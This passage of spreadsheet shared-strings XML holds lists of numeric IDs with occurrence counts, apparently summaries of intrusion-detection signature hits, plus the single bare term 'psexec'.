    <t>2100459 (1), 2100402 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059104 (1), 2059107 (1), 2059114 (1), 2059116 (1), 2059106 (1), 2059115 (1)</t>
  </si>
  <si>
    <t>2100459, 2100402, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059104, 2059107, 2059114, 2059116, 2059106, 2059115</t>
  </si>
  <si>
    <t>459 (1), 402 (1), 2100459 (1), 2100402 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059104 (1), 2059107 (1), 2059114 (1), 2059116 (1), 2059106 (1), 2059115 (1)</t>
  </si>
  <si>
    <t>459, 402, 2100459, 2100402, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059104, 2059107, 2059114, 2059116, 2059106, 2059115</t>
  </si>
  <si>
    <t>36540, 92322</t>
  </si>
  <si>
    <t>2002752 (5), 2002749 (5), 2000418 (3), 2059103 (2), 2059104 (2), 2059111 (2), 2059107 (2), 2059098 (1), 2067085 (1), 2059099 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059114 (1), 2059105 (1), 2059115 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2000418, 2059103, 2059104, 2059111, 2059107, 2059098, 2067085, 2059099, 2067087, 2059126, 2051116, 2059101, 2059109, 2059114, 2059105, 2059115</t>
  </si>
  <si>
    <t>12 (7), 2002752 (5), 2002749 (5), 2000418 (3), 2059103 (2), 2059104 (2), 2059111 (2), 2059107 (2), 2059098 (1), 2067085 (1), 2059099 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059114 (1), 2059105 (1), 2059115 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 2000418, 2059103, 2059104, 2059111, 2059107, 2059098, 2067085, 2059099, 2067087, 2059126, 2051116, 2059101, 2059109, 2059114, 2059105, 2059115</t>
  </si>
  <si>
    <t>12 (7), 2002752 (5), 2002749 (5)</t>
  </si>
  <si>
    <t>2059103 (2), 2059104 (2), 2059111 (2), 2059107 (2), 2059098 (1), 2067085 (1), 2059099 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059114 (1), 2059105 (1), 2059115 (1)</t>
  </si>
  <si>
    <t>2059103, 2059104, 2059111, 2059107, 2059098, 2067085, 2059099, 2067087, 2059126, 2051116, 2059101, 2059109, 2059114, 2059105, 2059115</t>
  </si>
  <si>
    <t>12 (2), 13586 (1)</t>
  </si>
  <si>
    <t>12, 13586</t>
  </si>
  <si>
    <t>13586 (1)</t>
  </si>
  <si>
    <t>13586</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2000418 (1), 2054218 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2000418, 2054218</t>
  </si>
  <si>
    <t>1325 (1), 2000418 (1)</t>
  </si>
  <si>
    <t>1325, 2000418</t>
  </si>
  <si>
    <t>2000418 (1), 1325 (1)</t>
  </si>
  <si>
    <t>2000418, 1325</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2054218 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2054218</t>
  </si>
  <si>
    <t>12 (6), 2002752 (2), 2002749 (2), 2054218 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 2054218</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2003099 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2003099</t>
  </si>
  <si>
    <t>14 (1)</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 14 (1), 2003099 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 14, 2003099</t>
  </si>
  <si>
    <t>47013</t>
  </si>
  <si>
    <t>15895</t>
  </si>
  <si>
    <t>18 (1473), 3 (106), 15 (38), 12 (32), 33 (19), 20 (8)</t>
  </si>
  <si>
    <t>18 (1473), 3 (106), 15 (38), 12 (32), 33 (19), 20 (8), 2002749 (3)</t>
  </si>
  <si>
    <t>18, 3, 15, 12, 33, 20, 2002749</t>
  </si>
  <si>
    <t>15 (38), 12 (32), 20 (8)</t>
  </si>
  <si>
    <t>15, 12, 20</t>
  </si>
  <si>
    <t>15 (38), 12 (32), 20 (8), 2002749 (3)</t>
  </si>
  <si>
    <t>15, 12, 20, 2002749</t>
  </si>
  <si>
    <t>18 (1472), 3 (106), 33 (19)</t>
  </si>
  <si>
    <t>18 (1473), 3 (106), 33 (19)</t>
  </si>
  <si>
    <t>93031, 9999</t>
  </si>
  <si>
    <t>2101201 (914), 2027250 (456), 2101129 (304), 2101071 (304), 2101016 (304), 2027263 (304), 2049402 (152), 2027261 (152), 2022520 (152), 2101145 (152), 2100993 (152), 2019526 (152), 2101877 (152), 2018413 (1), 2010229 (1)</t>
  </si>
  <si>
    <t>2101201, 2027250, 2101129, 2101071, 2101016, 2027263, 2049402, 2027261, 2022520, 2101145, 2100993, 2019526, 2101877, 2018413, 2010229</t>
  </si>
  <si>
    <t>50447, 17429, 12, 41742, 1201, 1213, 882, 895, 1288, 1826, 1129, 1071, 1016, 1141, 59258, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887, 1434, 1433, 2062, 43285, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1668, 1543, 1551, 839, 825, 1606, 993, 886, 42289, 1877</t>
  </si>
  <si>
    <t>2009885 (23356), 2101201 (914), 2027250 (456), 2101288 (456), 2008330 (456), 2000560 (456), 2101129 (304), 2101071 (304), 2101016 (304), 2027263 (304), 2049402 (152), 2027261 (152), 2022520 (152), 2100937 (152), 2101662 (152), 2101489 (152), 2101145 (152), 2100884 (152), 2100993 (152), 2019526 (152), 2101877 (152), 2101852 (152), 2010377 (22), 2009749 (21), 2002752 (8), 2002749 (8), 2010706 (8), 2018413 (1), 2010229 (1)</t>
  </si>
  <si>
    <t>2009885, 2101201, 2027250, 2101288, 2008330, 2000560, 2101129, 2101071, 2101016, 2027263, 2049402, 2027261, 2022520, 2100937, 2101662, 2101489, 2101145, 2100884, 2100993, 2019526, 2101877, 2101852, 2010377, 2009749, 2002752, 2002749, 2010706, 2018413, 2010229</t>
  </si>
  <si>
    <t>50447 (313915), 17429 (313426), 2009885 (23356), 12 (11627), 41742 (3264), 2101201 (914), 2027250 (456), 2101288 (456), 2008330 (456), 2000560 (456), 1201 (408), 1213 (340), 882 (340), 2101129 (304), 2101071 (304), 2101016 (304), 2027263 (304), 895 (272), 1288 (204), 2049402 (152), 2027261 (152), 2022520 (152), 2100937 (152), 2101662 (152), 2101489 (152), 2101145 (152), 2100884 (152), 2100993 (152), 2019526 (152), 2101877 (152), 2101852 (152), 1826 (136), 1129 (136), 1071 (136), 1016 (136), 1141 (136), 59258 (136), 1852 (68), 1520 (68), 1521 (68), 835 (68), 849 (68), 896 (68), 853 (68), 43290 (68), 887 (68), 1434 (68), 1433 (68), 2062 (68), 43285 (68), 940 (68), 937 (68), 33608 (68), 1662 (68), 1489 (68), 1145 (68), 1301 (68), 879 (68), 1218 (68), 845 (68), 885 (68), 1206 (68), 1231 (68), 1668 (68), 1543 (68), 1551 (68), 839 (68), 825 (68), 1606 (68), 993 (68), 886 (68), 42289 (68), 1877 (68), 2010377 (22), 2009749 (21), 2002752 (8), 2002749 (8), 2010706 (8), 2018413 (1), 2010229 (1)</t>
  </si>
  <si>
    <t>50447, 17429, 2009885, 12, 41742, 2101201, 2027250, 2101288, 2008330, 2000560, 1201, 1213, 882, 2101129, 2101071, 2101016, 2027263, 895, 1288, 2049402, 2027261, 2022520, 2100937, 2101662, 2101489, 2101145, 2100884, 2100993, 2019526, 2101877, 2101852, 1826, 1129, 1071, 1016, 1141, 59258, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887, 1434, 1433, 2062, 43285, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1668, 1543, 1551, 839, 825, 1606, 993, 886, 42289, 1877, 2010377, 2009749, 2002752, 2002749, 2010706, 2018413, 2010229</t>
  </si>
  <si>
    <t>1201 (914), 1213 (760), 882 (760), 895 (608), 1288 (456), 1129 (304), 1071 (304), 1016 (304), 1141 (304), 1826 (304), 1521 (153), 1434 (152), 1433 (152), 2062 (152), 43285 (152), 940 (152), 937 (152), 1662 (152), 1489 (152), 1145 (152), 1301 (152), 879 (152), 1218 (152), 845 (152), 885 (152), 1206 (152), 1231 (152), 1668 (152), 1543 (152), 1551 (152), 839 (152), 825 (152), 1606 (152), 993 (152), 886 (152), 1877 (152), 1852 (152), 1520 (152), 835 (152), 849 (152), 896 (152), 853 (152), 43290 (152), 887 (152), 1025 (2), 1029 (1)</t>
  </si>
  <si>
    <t>1201, 1213, 882, 895, 1288, 1129, 1071, 1016, 1141, 1826, 1521, 1434, 1433, 2062, 43285, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1668, 1543, 1551, 839, 825, 1606, 993, 886, 1877, 1852, 1520, 835, 849, 896, 853, 43290, 887, 1025, 1029</t>
  </si>
  <si>
    <t>2101071 (304), 2100993 (152), 2018413 (1)</t>
  </si>
  <si>
    <t>2101071, 2100993, 2018413</t>
  </si>
  <si>
    <t>50447 (313915), 1071 (136), 59258 (136), 1434 (68), 1433 (68), 1489 (68), 1668 (68), 993 (68)</t>
  </si>
  <si>
    <t>50447, 1071, 59258, 1434, 1433, 1489, 1668, 993</t>
  </si>
  <si>
    <t>2101071 (304), 2101489 (152), 2100993 (152), 2010377 (22), 2010706 (8), 2018413 (1)</t>
  </si>
  <si>
    <t>2101071, 2101489, 2100993, 2010377, 2010706, 2018413</t>
  </si>
  <si>
    <t>50447 (313915), 2101071 (304), 2101489 (152), 2100993 (152), 1071 (136), 59258 (136), 1434 (68), 1433 (68), 1489 (68), 1668 (68), 993 (68), 2010377 (22), 2010706 (8), 2018413 (1)</t>
  </si>
  <si>
    <t>50447, 2101071, 2101489, 2100993, 1071, 59258, 1434, 1433, 1489, 1668, 993, 2010377, 2010706, 2018413</t>
  </si>
  <si>
    <t>1071 (304), 1434 (152), 1433 (152), 1489 (152), 1668 (152), 993 (152), 1029 (1)</t>
  </si>
  <si>
    <t>1071, 1434, 1433, 1489, 1668, 993, 1029</t>
  </si>
  <si>
    <t>2101071 (304), 1071 (304), 2100993 (152), 1434 (152), 1433 (152), 1489 (152), 1668 (152), 993 (152), 2018413 (1), 1029 (1)</t>
  </si>
  <si>
    <t>2101071, 1071, 2100993, 1434, 1433, 1489, 1668, 993, 2018413, 1029</t>
  </si>
  <si>
    <t>2101201 (914), 2027250 (456), 2101129 (304), 2101016 (304), 2027263 (304), 2049402 (152), 2027261 (152), 2022520 (152), 2101145 (152), 2019526 (152), 2101877 (152), 2010229 (1)</t>
  </si>
  <si>
    <t>2101201, 2027250, 2101129, 2101016, 2027263, 2049402, 2027261, 2022520, 2101145, 2019526, 2101877, 2010229</t>
  </si>
  <si>
    <t>12 (21291), 2101201 (914), 2027250 (456), 2101129 (304), 2101016 (304), 2027263 (304), 2049402 (152), 2027261 (152), 2022520 (152), 2101145 (152), 2019526 (152), 2101877 (152), 2010229 (1)</t>
  </si>
  <si>
    <t>12, 2101201, 2027250, 2101129, 2101016, 2027263, 2049402, 2027261, 2022520, 2101145, 2019526, 2101877, 2010229</t>
  </si>
  <si>
    <t>12, 41742, 1201, 1213, 882, 895, 1288, 1826, 1129, 1016, 1141, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887, 2062, 43285, 940, 937, 33608, 1662, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1543, 1551, 839, 825, 1606, 886, 42289, 1877</t>
  </si>
  <si>
    <t>2009885 (23356), 2101201 (914), 2027250 (456), 2101288 (456), 2101129 (304), 2101016 (304), 2027263 (304), 2049402 (152), 2027261 (152), 2022520 (152), 2100937 (152), 2101662 (152), 2101145 (152), 2100884 (152), 2019526 (152), 2101877 (152), 2101852 (152), 2009749 (21), 2002752 (8), 2002749 (8), 2010229 (1)</t>
  </si>
  <si>
    <t>2009885, 2101201, 2027250, 2101288, 2101129, 2101016, 2027263, 2049402, 2027261, 2022520, 2100937, 2101662, 2101145, 2100884, 2019526, 2101877, 2101852, 2009749, 2002752, 2002749, 2010229</t>
  </si>
  <si>
    <t>2009885 (23356), 12 (11627), 41742 (3264), 2101201 (914), 2027250 (456), 2101288 (456), 1201 (408), 1213 (340), 882 (340), 2101129 (304), 2101016 (304), 2027263 (304), 895 (272), 1288 (204), 2049402 (152), 2027261 (152), 2022520 (152), 2100937 (152), 2101662 (152), 2101145 (152), 2100884 (152), 2019526 (152), 2101877 (152), 2101852 (152), 1826 (136), 1129 (136), 1016 (136), 1141 (136), 1852 (68), 1520 (68), 1521 (68), 835 (68), 849 (68), 896 (68), 853 (68), 43290 (68), 887 (68), 2062 (68), 43285 (68), 940 (68), 937 (68), 33608 (68), 1662 (68), 1145 (68), 1301 (68), 879 (68), 1218 (68), 845 (68), 885 (68), 1206 (68), 1231 (68), 1543 (68), 1551 (68), 839 (68), 825 (68), 1606 (68), 886 (68), 42289 (68), 1877 (68), 2009749 (21), 2002752 (8), 2002749 (8), 2010229 (1)</t>
  </si>
  <si>
    <t>2009885, 12, 41742, 2101201, 2027250, 2101288, 1201, 1213, 882, 2101129, 2101016, 2027263, 895, 1288, 2049402, 2027261, 2022520, 2100937, 2101662, 2101145, 2100884, 2019526, 2101877, 2101852, 1826, 1129, 1016, 1141, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887, 2062, 43285, 940, 937, 33608, 1662, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1543, 1551, 839, 825, 1606, 886, 42289, 1877, 2009749, 2002752, 2002749, 2010229</t>
  </si>
  <si>
    <t>1201 (914), 1213 (760), 882 (760), 895 (608), 1288 (456), 1129 (304), 1016 (304), 1141 (304), 1826 (304), 1521 (153), 2062 (152), 43285 (152), 940 (152), 937 (152), 1662 (152), 1145 (152), 1301 (152), 879 (152), 1218 (152), 845 (152), 885 (152), 1206 (152), 1231 (152), 1543 (152), 1551 (152), 839 (152), 825 (152), 1606 (152), 886 (152), 1877 (152), 1852 (152), 1520 (152), 835 (152), 849 (152), 896 (152), 853 (152), 43290 (152), 887 (152), 1025 (2)</t>
  </si>
  <si>
    <t>1201, 1213, 882, 895, 1288, 1129, 1016, 1141, 1826, 1521, 2062, 43285, 940, 937, 1662, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1543, 1551, 839, 825, 1606, 886, 1877, 1852, 1520, 835, 849, 896, 853, 43290, 887, 1025</t>
  </si>
  <si>
    <t>12 (21291), 2101201 (914), 1201 (914), 1213 (760), 882 (760), 895 (608), 2027250 (456), 1288 (456), 2101129 (304), 2101016 (304), 2027263 (304), 1129 (304), 1016 (304), 1141 (304), 1826 (304), 1521 (153), 2049402 (152), 2027261 (152), 2022520 (152), 2101145 (152), 2019526 (152), 2101877 (152), 2062 (152), 43285 (152), 940 (152), 937 (152), 1662 (152), 1145 (152), 1301 (152), 879 (152), 1218 (152), 845 (152), 885 (152), 1206 (152), 1231 (152), 1543 (152), 1551 (152), 839 (152), 825 (152), 1606 (152), 886 (152), 1877 (152), 1852 (152), 1520 (152), 835 (152), 849 (152), 896 (152), 853 (152), 43290 (152), 887 (152), 1025 (2), 2010229 (1)</t>
  </si>
  <si>
    <t>12, 2101201, 1201, 1213, 882, 895, 2027250, 1288, 2101129, 2101016, 2027263, 1129, 1016, 1141, 1826, 1521, 2049402, 2027261, 2022520, 2101145, 2019526, 2101877, 2062, 43285, 940, 937, 1662, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1543, 1551, 839, 825, 1606, 886, 1877, 1852, 1520, 835, 849, 896, 853, 43290, 887, 1025, 2010229</t>
  </si>
  <si>
    <t>17429 (313426)</t>
  </si>
  <si>
    <t>17429</t>
  </si>
  <si>
    <t>2008330 (456), 2000560 (456)</t>
  </si>
  <si>
    <t>2008330, 2000560</t>
  </si>
  <si>
    <t>17429 (313426), 2008330 (456), 2000560 (456)</t>
  </si>
  <si>
    <t>17429, 2008330, 2000560</t>
  </si>
  <si>
    <t>12475, 13900, 29263, 29264</t>
  </si>
  <si>
    <t>12648, 29261</t>
  </si>
  <si>
    <t>16321</t>
  </si>
  <si>
    <t>95497, 9999</t>
  </si>
  <si>
    <t>psexec</t>
  </si>
  <si>
    <t>16074</t>
  </si>
  <si>
    <t>18 (26), 14 (4), 8 (3), 3 (3), 33 (3), 32 (2)</t>
  </si>
  <si>
    <t>18, 14, 8, 3, 33, 32</t>
  </si>
  <si>
    <t>2009358 (10), 2024364 (10), 2010937 (3), 2010939 (2), 2010935 (2), 2010936 (2), 2002911 (1), 2002910 (1), 2023753 (1), 2018317 (1), 2034718 (1), 2013409 (1), 2034730 (1)</t>
  </si>
  <si>
    <t>2009358, 2024364, 2010937, 2010939, 2010935, 2010936, 2002911, 2002910, 2023753, 2018317, 2034718, 2013409, 2034730</t>
  </si>
  <si>
    <t>18 (26), 50447 (12), 14 (4), 8 (3), 3 (3), 33 (3), 1421 (2), 1418 (2), 44484 (2), 44487 (2), 44485 (2), 44489 (2), 32 (2), 49040 (1)</t>
  </si>
  <si>
    <t>18, 50447, 14, 8, 3, 33, 1421, 1418, 44484, 44487, 44485, 44489, 32, 49040</t>
  </si>
  <si>
    <t>2009358 (10), 2024364 (10), 2100472 (5), 2003099 (4), 2002752 (3), 2002749 (3), 2010937 (3), 2010939 (2), 2010935 (2), 2100615 (2), 2010936 (2), 2101418 (2), 2044666 (2), 2034730 (2), 2002910 (1), 2006408 (1), 2023753 (1), 2007571 (1), 2018317 (1), 2034718 (1), 2013409 (1)</t>
  </si>
  <si>
    <t>2009358, 2024364, 2100472, 2003099, 2002752, 2002749, 2010937, 2010939, 2010935, 2100615, 2010936, 2101418, 2044666, 2034730, 2002910, 2006408, 2023753, 2007571, 2018317, 2034718, 2013409</t>
  </si>
  <si>
    <t>18 (26), 50447 (12), 2009358 (10), 2024364 (10), 2100472 (5), 14 (4), 2003099 (4), 8 (3), 3 (3), 33 (3), 2002752 (3), 2002749 (3), 2010937 (3), 1421 (2), 1418 (2), 44484 (2), 44487 (2), 44485 (2), 44489 (2), 32 (2), 2010939 (2), 2010935 (2), 2100615 (2), 2010936 (2), 2101418 (2), 2044666 (2), 2034730 (2), 49040 (1), 2002910 (1), 2006408 (1), 2023753 (1), 2007571 (1), 2018317 (1), 2034718 (1), 2013409 (1)</t>
  </si>
  <si>
    <t>18, 50447, 2009358, 2024364, 2100472, 14, 2003099, 8, 3, 33, 2002752, 2002749, 2010937, 1421, 1418, 44484, 44487, 44485, 44489, 32, 2010939, 2010935, 2100615, 2010936, 2101418, 2044666, 2034730, 49040, 2002910, 2006408, 2023753, 2007571, 2018317, 2034718, 2013409</t>
  </si>
  <si>
    <t>2009358 (10), 2024364 (10), 2034718 (1), 2034730 (1)</t>
  </si>
  <si>
    <t>2009358, 2024364, 2034718, 2034730</t>
  </si>
  <si>
    <t>50447 (12), 44484 (2), 44487 (2), 44485 (2), 44489 (2), 49040 (1)</t>
  </si>
  <si>
    <t>50447, 44484, 44487, 44485, 44489, 49040</t>
  </si>
  <si>
    <t>2009358 (10), 2024364 (10), 2034730 (2), 2006408 (1), 2007571 (1), 2034718 (1)</t>
  </si>
  <si>
    <t>2009358, 2024364, 2034730, 2006408, 2007571, 2034718</t>
  </si>
  <si>
    <t>50447 (12), 2009358 (10), 2024364 (10), 44484 (2), 44487 (2), 44485 (2), 44489 (2), 2034730 (2), 49040 (1), 2006408 (1), 2007571 (1), 2034718 (1)</t>
  </si>
  <si>
    <t>50447, 2009358, 2024364, 44484, 44487, 44485, 44489, 2034730, 49040, 2006408, 2007571, 2034718</t>
  </si>
  <si>
    <t>14 (4)</t>
  </si>
  <si>
    <t>2010937 (3), 2010939 (2), 2010935 (2), 2010936 (2), 2002911 (1), 2002910 (1), 2023753 (1), 2018317 (1), 2013409 (1)</t>
  </si>
  <si>
    <t>2010937, 2010939, 2010935, 2010936, 2002911, 2002910, 2023753, 2018317, 2013409</t>
  </si>
  <si>
    <t>14 (4), 2010937 (3), 2010939 (2), 2010935 (2), 2010936 (2), 2002911 (1), 2002910 (1), 2023753 (1), 2018317 (1), 2013409 (1)</t>
  </si>
  <si>
    <t>14, 2010937, 2010939, 2010935, 2010936, 2002911, 2002910, 2023753, 2018317, 2013409</t>
  </si>
  <si>
    <t>14 (4), 1421 (2), 1418 (2)</t>
  </si>
  <si>
    <t>14, 1421, 1418</t>
  </si>
  <si>
    <t>2100472 (5), 2003099 (4), 2002752 (3), 2002749 (3), 2010937 (3), 2010939 (2), 2010935 (2), 2100615 (2), 2010936 (2), 2101418 (2), 2002910 (1), 2023753 (1), 2018317 (1), 2013409 (1)</t>
  </si>
  <si>
    <t>2100472, 2003099, 2002752, 2002749, 2010937, 2010939, 2010935, 2100615, 2010936, 2101418, 2002910, 2023753, 2018317, 2013409</t>
  </si>
  <si>
    <t>2100472 (5), 14 (4), 2003099 (4), 2002752 (3), 2002749 (3), 2010937 (3), 1421 (2), 1418 (2), 2010939 (2), 2010935 (2), 2100615 (2), 2010936 (2), 2101418 (2), 2002910 (1), 2023753 (1), 2018317 (1), 2013409 (1)</t>
  </si>
  <si>
    <t>2100472, 14, 2003099, 2002752, 2002749, 2010937, 1421, 1418, 2010939, 2010935, 2100615, 2010936, 2101418, 2002910, 2023753, 2018317, 2013409</t>
  </si>
  <si>
    <t>14 (4), 2010937 (3), 2010939 (2), 2010935 (2), 2010936 (2), 1421 (2), 1418 (2), 2002911 (1), 2002910 (1), 2023753 (1), 2018317 (1), 2013409 (1)</t>
  </si>
  <si>
    <t>14, 2010937, 2010939, 2010935, 2010936, 1421, 1418, 2002911, 2002910, 2023753, 2018317, 2013409</t>
  </si>
  <si>
    <t>18 (26), 8 (3), 3 (3), 33 (3), 32 (2)</t>
  </si>
  <si>
    <t>18, 8, 3, 33, 32</t>
  </si>
  <si>
    <t>2044666 (2)</t>
  </si>
  <si>
    <t>2044666</t>
  </si>
  <si>
    <t>18 (26), 8 (3), 3 (3), 33 (3), 32 (2), 2044666 (2)</t>
  </si>
  <si>
    <t>18, 8, 3, 33, 32, 2044666</t>
  </si>
  <si>
    <t>30520, 35364, 59582, 9999</t>
  </si>
  <si>
    <t>94317, 94318</t>
  </si>
  <si>
    <t>58433</t>
  </si>
  <si>
    <t>50447 (171), 32481 (114), 31939 (57)</t>
  </si>
  <si>
    <t>50447, 32481, 31939</t>
  </si>
  <si>
    <t>2012885 (57), 2009004 (57), 2011085 (57), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>2012885, 2009004, 2011085, 2002752, 2002749</t>
  </si>
  <si>
    <t>2012885 (57), 2009004 (57)</t>
  </si>
  <si>
    <t>2012885, 2009004</t>
  </si>
  <si>
    <t>50447 (171), 32481 (114), 31939 (57), 2012885 (57), 2009004 (57)</t>
  </si>
  <si>
    <t>50447, 32481, 31939, 2012885, 2009004</t>
  </si>
  <si>
    <t>2011085 (57)</t>
  </si>
  <si>
    <t>56610, 59420, 9999</t>
  </si>
  <si>
    <t>40129</t>
  </si>
  <si>
    <t>2101201 (4), 2027250 (3), 2101016 (2), 2027263 (2), 2049402 (1), 2101129 (1), 2101071 (1), 2027261 (1), 2022520 (1), 2101145 (1), 2010229 (1), 2100993 (1), 2019526 (1), 2101877 (1)</t>
  </si>
  <si>
    <t>2101201, 2027250, 2101016, 2027263, 2049402, 2101129, 2101071, 2027261, 2022520, 2101145, 2010229, 2100993, 2019526, 2101877</t>
  </si>
  <si>
    <t>50447 (4615), 17429 (4509), 12 (183), 41742 (48), 1213 (5), 882 (5), 1201 (4), 895 (4), 1288 (3), 1016 (2), 1141 (2), 59258 (2), 1826 (2), 1434 (1), 1433 (1), 1129 (1), 1071 (1), 2062 (1), 43285 (1), 940 (1), 937 (1), 33608 (1), 1662 (1), 1489 (1), 1145 (1), 1301 (1), 879 (1), 1218 (1), 845 (1), 885 (1), 1206 (1), 1231 (1), 1668 (1), 1543 (1), 1551 (1), 839 (1), 825 (1), 1606 (1), 993 (1), 886 (1), 42289 (1), 1877 (1), 1852 (1), 1520 (1), 1521 (1), 835 (1), 849 (1), 896 (1), 853 (1), 43290 (1), 887 (1)</t>
  </si>
  <si>
    <t>50447, 17429, 12, 41742, 1213, 882, 1201, 895, 1288, 1016, 1141, 59258, 1826, 1434, 1433, 1129, 1071, 2062, 43285, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1668, 1543, 1551, 839, 825, 1606, 993, 886, 42289, 1877, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887</t>
  </si>
  <si>
    <t>2009885 (153), 2101201 (4), 2027250 (3), 2101288 (3), 2008330 (3), 2000560 (3), 2002752 (2), 2002749 (2), 2101016 (2), 2027263 (2), 2049402 (1), 2101129 (1), 2101071 (1), 2027261 (1), 2022520 (1), 2100937 (1), 2101662 (1), 2101489 (1), 2101145 (1), 2010229 (1), 2100884 (1), 2100993 (1), 2010377 (1), 2019526 (1), 2101877 (1), 2101852 (1)</t>
  </si>
  <si>
    <t>2009885, 2101201, 2027250, 2101288, 2008330, 2000560, 2002752, 2002749, 2101016, 2027263, 2049402, 2101129, 2101071, 2027261, 2022520, 2100937, 2101662, 2101489, 2101145, 2010229, 2100884, 2100993, 2010377, 2019526, 2101877, 2101852</t>
  </si>
  <si>
    <t>50447 (4615), 17429 (4509), 12 (183), 2009885 (153), 41742 (48), 1213 (5), 882 (5), 1201 (4), 895 (4), 2101201 (4), 1288 (3), 2027250 (3), 2101288 (3), 2008330 (3), 2000560 (3), 1016 (2), 1141 (2), 59258 (2), 1826 (2), 2002752 (2), 2002749 (2), 2101016 (2), 2027263 (2), 1434 (1), 1433 (1), 1129 (1), 1071 (1), 2062 (1), 43285 (1), 940 (1), 937 (1), 33608 (1), 1662 (1), 1489 (1), 1145 (1), 1301 (1), 879 (1), 1218 (1), 845 (1), 885 (1), 1206 (1), 1231 (1), 1668 (1), 1543 (1), 1551 (1), 839 (1), 825 (1), 1606 (1), 993 (1), 886 (1), 42289 (1), 1877 (1), 1852 (1), 1520 (1), 1521 (1), 835 (1), 849 (1), 896 (1), 853 (1), 43290 (1), 887 (1), 2049402 (1), 2101129 (1), 2101071 (1), 2027261 (1), 2022520 (1), 2100937 (1), 2101662 (1), 2101489 (1), 2101145 (1), 2010229 (1), 2100884 (1), 2100993 (1), 2010377 (1), 2019526 (1), 2101877 (1), 2101852 (1)</t>
  </si>
  <si>
    <t>50447, 17429, 12, 2009885, 41742, 1213, 882, 1201, 895, 2101201, 1288, 2027250, 2101288, 2008330, 2000560, 1016, 1141, 59258, 1826, 2002752, 2002749, 2101016, 2027263, 1434, 1433, 1129, 1071, 2062, 43285, 940, 937, 33608, 1662, 1489, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1668, 1543, 1551, 839, 825, 1606, 993, 886, 42289, 1877, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887, 2049402, 2101129, 2101071, 2027261, 2022520, 2100937, 2101662, 2101489, 2101145, 2010229, 2100884, 2100993, 2010377, 2019526, 2101877, 2101852</t>
  </si>
  <si>
    <t>1213 (5), 882 (5), 1201 (4), 895 (4), 1288 (3), 1016 (2), 1141 (2), 1826 (2), 1434 (1), 1433 (1), 1129 (1), 1071 (1), 2062 (1), 43285 (1), 940 (1), 937 (1), 1662 (1), 1489 (1), 1145 (1), 1301 (1), 879 (1), 1218 (1), 845 (1), 885 (1), 1206 (1), 1231 (1), 1668 (1), 1543 (1), 1551 (1), 839 (1), 825 (1), 1606 (1), 993 (1), 886 (1), 1877 (1), 1852 (1), 1520 (1), 1521 (1), 835 (1), 849 (1), 896 (1), 853 (1), 43290 (1), 887 (1)</t>
  </si>
  <si>
    <t>1213, 882, 1201, 895, 1288, 1016, 1141, 1826, 1434, 1433, 1129, 1071, 2062, 43285, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1668, 1543, 1551, 839, 825, 1606, 993, 886, 1877, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887</t>
  </si>
  <si>
    <t>2101071 (1), 2100993 (1)</t>
  </si>
  <si>
    <t>2101071, 2100993</t>
  </si>
  <si>
    <t>50447 (4615), 59258 (2), 1434 (1), 1433 (1), 1071 (1), 1489 (1), 1668 (1), 993 (1)</t>
  </si>
  <si>
    <t>50447, 59258, 1434, 1433, 1071, 1489, 1668, 993</t>
  </si>
  <si>
    <t>2101071 (1), 2101489 (1), 2100993 (1), 2010377 (1)</t>
  </si>
  <si>
    <t>2101071, 2101489, 2100993, 2010377</t>
  </si>
  <si>
    <t>50447 (4615), 59258 (2), 1434 (1), 1433 (1), 1071 (1), 1489 (1), 1668 (1), 993 (1), 2101071 (1), 2101489 (1), 2100993 (1), 2010377 (1)</t>
  </si>
  <si>
    <t>50447, 59258, 1434, 1433, 1071, 1489, 1668, 993, 2101071, 2101489, 2100993, 2010377</t>
  </si>
  <si>
    <t>1434 (1), 1433 (1), 1071 (1), 1489 (1), 1668 (1), 993 (1)</t>
  </si>
  <si>
    <t>1434, 1433, 1071, 1489, 1668, 993</t>
  </si>
  <si>
    <t>2101071 (1), 2100993 (1), 1434 (1), 1433 (1), 1071 (1), 1489 (1), 1668 (1), 993 (1)</t>
  </si>
